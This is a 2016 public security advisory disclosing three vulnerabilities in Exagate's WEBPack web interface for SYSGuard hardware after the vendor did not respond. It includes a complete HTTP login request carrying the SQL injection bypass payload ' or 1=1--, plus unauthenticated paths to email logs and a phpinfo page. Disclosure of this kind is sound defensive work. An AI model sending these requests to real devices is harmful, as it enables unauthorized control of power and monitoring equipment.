Exagate WEBPack Management System - Multiple Vulnerabilities

Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities

Author:
========
Halil Dalabasmaz

Release Date:
==============
07 OCT 2016

Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
 
Vendor Homepage:
=================
http://www.exagate.com/

Vulnerability Information:
===========================
Exagate company uses WEBPack Management System software on the hardware.
The software is web-based and it is provide control on the hardware. There are
multiple vulnerabilities on that software.

Vulnerability #1: SQL Injection
================================

There is no any filtering or validation mechanisim on "login.php". "username"
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
request is given below.

POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=root&password=' or 1=1--

Vulnerability #2: Unauthorized Access To Sensetive Information
===============================================================

The software is capable of sending e-mail to system admins. But there is no
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
anonymously from "http://<TARGET HOST>/emaillog.txt".

Vulnerability #3: Unremoved Configuration Files
================================================

The software contains the PHP Info file on the following URL.

http://<TARGET HOST>/api/phpinfo.php

Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 - 	Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - 	No response from vendor and re-attempted to contact vendor
07 OCT 2016 - 	No response from vendor
07 OCT 2016 - 	Public Disclosure
 
Discovery Status:
==================
Published
 
Affected Product(s):
=====================
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)

Tested On:
===========
Exagate SYSGuard 3001

Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without 
any warranty. BGA disclaims all  warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
  
Domain:     www.bgasecurity.com
Social:     twitter.com/bgasecurity
Contact:    [email protected]

Copyright © 2016 | BGA Security LLC